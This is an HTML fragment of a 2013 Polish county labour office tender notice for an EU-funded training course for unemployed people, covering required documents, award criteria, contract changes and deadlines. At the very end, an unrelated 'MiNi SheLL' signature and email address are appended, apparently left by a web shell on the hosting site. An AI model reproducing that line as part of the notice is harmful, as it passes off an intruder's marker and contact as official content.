<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">4.1.	Oświadczenia dotyczące udostępnienia i wynajęcia bazy szkoleniowej, sprzętu oraz zobowiązania kadry dydaktycznej - wg załącznika 7a i 7b do SIWZ.
4.2.	Wzór dokumentów /zaświadczeń, certyfikatów/ potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
4.3.	Wzór ankiety oceniającej szkolenie, jaka zostanie przeprowadzona wśród kursantów na zakończenie kursu.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.1.	Załącznik Nr 1 do SIWZ - Formularz Oferta Szkolenia  
5.2.	Załącznik Nr 2 do SIWZ  - Formularz - Program Kursu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie kadry dydaktycznej - 15</li>
<li>3 - Warunki lokalowe i wyposażenie techniczno-dydaktyczne szkolenia - 20</li>
<li>4 - Doświadczenie wykonawcy - 10</li>
<li>5 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie wykonawcy, np. w przypadku problemów z rekrutacją kandydatów na szkolenie;
b)	zmiana ceny szkolenia przysługująca instytucji szkoleniowej, przy zachowaniu jednostkowej kalkulacji kosztów zawartej w ofercie szkolenia - w przypadku zmiany liczby osób bezrobotnych objętych szkoleniem - która do dnia rozpoczęcia szkolenia może się zmniejszyć, jednakże grupa szkoleniowa nie może liczyć mniej niż 10 osób i nie więcej niż 12 osób;
c)	zmiana kadry dydaktycznej zaangażowanej w realizację szkolenia, wyłącznie 	w przypadku wystąpienia udokumentowanych nadzwyczajnych okoliczności uniemożliwiających prowadzenie zajęć szkoleniowych przez wskazanego w ofercie wykładowcę/trenera/instruktora (w szczególności z powodu choroby, wypadku czy śmieci osoby), pod warunkiem złożenia przez wykonawcę pisemnego wniosku  w tej sprawie i po akceptacji przez Zamawiającego; zaproponowane osoby powinny posiadać kwalifikacje i doświadczenie zawodowe co najmniej takie jak wykładowca, który ma zostać zastąpiony. 
d)	zmiana harmonogramu zajęć stanowiącego załącznik nr 1 do umowy szkoleniowej - w uzasadnionych przypadkach i za zgodą Zamawiającego;
e)	wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pupmragowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy  w Mrągowie
ul. Kopernika 1, 11-700 Mrągowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy  w Mrągowie
ul. Kopernika 1, 11-700 Mrągowo, pok. 10 -sekretariat-.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt +Młodzi nasza przyszłość!+ współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Priorytet VI: Rynek pracy otwarty dla wszystkich, Działanie 6.1: Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1: Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com